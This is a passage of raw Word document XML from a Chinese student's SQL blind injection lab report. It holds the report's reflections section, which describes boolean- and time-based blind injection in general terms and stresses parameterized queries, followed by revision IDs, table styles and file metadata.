          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D45861">
      <w:pPr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四、心得体会</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F5DD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284EB8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本次SQL盲注实验中，我理解了SQL注入攻击的两种主要形式——基于布尔值和基于时间的盲注。通过实验，我不仅学会了如何利用这些漏洞进行信息泄露，还加深了对数据库结构和数据的了解，尤其是在缺乏直接错误信息的情况下，如何通过精确的查询构造来逐步推测出数据库、表名及字段信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D229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实验，我体会到了SQL盲注在Web安全中的重要性，以及如何在实际环境中识别并利用这些漏洞。虽然盲注过程可能相对繁琐，但它也展示了攻击者如何通过巧妙的查询绕过正常的输入验证，从而获取敏感信息。这提醒我在开发过程中，必须特别注重SQL注入的防护，采取诸如预处理语句、参数化查询等有效的防护措施。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C11805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总的来说，本次实验不仅</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提高了我对SQL注入的认知，也让我对如何增强系统安全性有了更深的思考。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E0C82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37E95C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37E95C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405D"/>
    <w:rsid w:val="00093442"/>
    <w:rsid w:val="001465EB"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="00224708"/>
    <w:rsid w:val="00250C7D"/>
    <w:rsid w:val="0026466C"/>
    <w:rsid w:val="00290B5B"/>
    <w:rsid w:val="002E0356"/>
    <w:rsid w:val="00385520"/>
    <w:rsid w:val="003B49FC"/>
    <w:rsid w:val="004139F2"/>
    <w:rsid w:val="004155C0"/>
    <w:rsid w:val="004233FA"/>
    <w:rsid w:val="00437BA3"/>
    <w:rsid w:val="004757C3"/>
    <w:rsid w:val="00547840"/>
    <w:rsid w:val="00741891"/>
    <w:rsid w:val="007F7BC3"/>
    <w:rsid w:val="00866D1D"/>
    <w:rsid w:val="008C7F28"/>
    <w:rsid w:val="00980B2B"/>
    <w:rsid w:val="00A171A2"/>
    <w:rsid w:val="00B450C4"/>
    <w:rsid w:val="00B476E3"/>
    <w:rsid w:val="00B941F7"/>
    <w:rsid w:val="00CB4273"/>
    <w:rsid w:val="00CB7C6C"/>
    <w:rsid w:val="00D515D5"/>
    <w:rsid w:val="00EA39CA"/>
    <w:rsid w:val="049D48CE"/>
    <w:rsid w:val="0575419C"/>
    <w:rsid w:val="08880CA1"/>
    <w:rsid w:val="08B1373D"/>
    <w:rsid w:val="0D0A74C6"/>
    <w:rsid w:val="0D5253D4"/>
    <w:rsid w:val="0D605D31"/>
    <w:rsid w:val="0DF80343"/>
    <w:rsid w:val="0E8337DA"/>
    <w:rsid w:val="0E9C3654"/>
    <w:rsid w:val="0EFA6789"/>
    <w:rsid w:val="0F0E3F60"/>
    <w:rsid w:val="116326A0"/>
    <w:rsid w:val="12031B42"/>
    <w:rsid w:val="12E62490"/>
    <w:rsid w:val="1A334EF5"/>
    <w:rsid w:val="1CBA4E5F"/>
    <w:rsid w:val="1E403142"/>
    <w:rsid w:val="1EC14044"/>
    <w:rsid w:val="28757E8C"/>
    <w:rsid w:val="2AD825A8"/>
    <w:rsid w:val="2B5465DD"/>
    <w:rsid w:val="2C4E2460"/>
    <w:rsid w:val="2D9E5321"/>
    <w:rsid w:val="2DA7293E"/>
    <w:rsid w:val="2E490C9F"/>
    <w:rsid w:val="2F866E22"/>
    <w:rsid w:val="2FD1009E"/>
    <w:rsid w:val="30E02716"/>
    <w:rsid w:val="32045250"/>
    <w:rsid w:val="32A44F22"/>
    <w:rsid w:val="34042EE0"/>
    <w:rsid w:val="34AC10D9"/>
    <w:rsid w:val="35A90231"/>
    <w:rsid w:val="38A3523A"/>
    <w:rsid w:val="39312C51"/>
    <w:rsid w:val="39397D91"/>
    <w:rsid w:val="39EB70E7"/>
    <w:rsid w:val="3ABF0B4A"/>
    <w:rsid w:val="3B6C0C93"/>
    <w:rsid w:val="3C613794"/>
    <w:rsid w:val="3EFD746B"/>
    <w:rsid w:val="3F261A88"/>
    <w:rsid w:val="3FD22766"/>
    <w:rsid w:val="40210BCD"/>
    <w:rsid w:val="427A50E5"/>
    <w:rsid w:val="43851182"/>
    <w:rsid w:val="46F37995"/>
    <w:rsid w:val="474A3B34"/>
    <w:rsid w:val="477E528F"/>
    <w:rsid w:val="48305A7C"/>
    <w:rsid w:val="49AA458F"/>
    <w:rsid w:val="4AE0646B"/>
    <w:rsid w:val="4D640612"/>
    <w:rsid w:val="50067440"/>
    <w:rsid w:val="51E56BDF"/>
    <w:rsid w:val="529A56E5"/>
    <w:rsid w:val="52CA39B6"/>
    <w:rsid w:val="53257B4E"/>
    <w:rsid w:val="54C005C6"/>
    <w:rsid w:val="554D280E"/>
    <w:rsid w:val="567E24A2"/>
    <w:rsid w:val="578F2469"/>
    <w:rsid w:val="5EBE6789"/>
    <w:rsid w:val="5FA84AE5"/>
    <w:rsid w:val="5FFD2C0B"/>
    <w:rsid w:val="604C23EA"/>
    <w:rsid w:val="616B6BE8"/>
    <w:rsid w:val="62C01DA4"/>
    <w:rsid w:val="667208B3"/>
    <w:rsid w:val="66753C67"/>
    <w:rsid w:val="69120BD7"/>
    <w:rsid w:val="693335F4"/>
    <w:rsid w:val="69930147"/>
    <w:rsid w:val="6AC202A3"/>
    <w:rsid w:val="6B2262B8"/>
    <w:rsid w:val="6CF22103"/>
    <w:rsid w:val="6D2C3C32"/>
    <w:rsid w:val="6ED21161"/>
    <w:rsid w:val="6FFD1973"/>
    <w:rsid w:val="7030554C"/>
    <w:rsid w:val="70A338E5"/>
    <w:rsid w:val="72DD0F79"/>
    <w:rsid w:val="740E3A28"/>
    <w:rsid w:val="74B977A1"/>
    <w:rsid w:val="7A29160C"/>
    <w:rsid w:val="7A60215E"/>
    <w:rsid w:val="7BBA17D2"/>
    <w:rsid w:val="7C99416E"/>
    <w:rsid w:val="7D2012E9"/>
    <w:rsid w:val="7D2C5EE0"/>
    <w:rsid w:val="7DB01C8C"/>
    <w:rsid w:val="7E0362EB"/>
    <w:rsid w:val="7E2A1263"/>
    <w:rsid w:val="7EAD50A6"/>
    <w:rsid w:val="7F60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  <w:style w:type="table" w:customStyle="1" w:styleId="9">
    <w:name w:val="无格式表格 41"/>
    <w:basedOn w:val="4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  <w:style w:type="table" w:customStyle="1" w:styleId="11">
    <w:name w:val="无格式表格 11"/>
    <w:basedOn w:val="4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2">
    <w:name w:val="无格式表格 42"/>
    <w:basedOn w:val="4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3">
    <w:name w:val="Plain Table 3"/>
    <w:basedOn w:val="4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4">
    <w:name w:val="Plain Table 4"/>
    <w:basedOn w:val="4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5">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="4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1886</Words>
  <Characters>3983</Characters>
  <Lines>180</Lines>
  <Paragraphs>99</Paragraphs>
  <TotalTime>32</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4350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2024-11-21T13:08:00Z</dcterms:created>
  <dc:creator>Lenovo</dc:creator>
  <cp:lastModifiedBy>蒋枘言</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-30T06:15:52Z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4D7E0E4BD3FA4F30AF7B2E42EAB9EA90_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNDgzNzlkZmIxMjc2MmEzN2FjNzA2NjU0M2NkNWNhZWUiLCJ1c2VySWQiOiIxNzAyMzkzNTU5In0=</vt:lpwstr>
  </property>
</Properties>
</file>